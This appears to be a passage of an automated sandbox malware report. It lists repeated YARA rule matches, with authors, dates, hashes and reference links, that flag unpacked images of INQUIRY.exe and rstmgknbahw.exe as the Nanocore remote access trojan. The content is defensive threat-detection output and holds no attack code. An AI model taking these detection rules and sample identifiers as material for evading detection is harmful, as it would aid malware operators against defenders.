      Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.782558.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.INQUIRY.exe.22f1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.rstmgknbahw.exe.2400000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.38d3258.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.39a98c0.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.782558.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.38d3258.5.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.3820e14.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.2.rstmgknbahw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.2.INQUIRY.exe.2520000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 1.2.INQUIRY.exe.22e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.4940000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.2.rstmgknbahw.exe.37a3258.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.rstmgknbahw.exe.2300000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.0.INQUIRY.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 4.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.2.rstmgknbahw.exe.2400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 6.0.rstmgknbahw.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.rstmgknbahw.exe.638d50.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
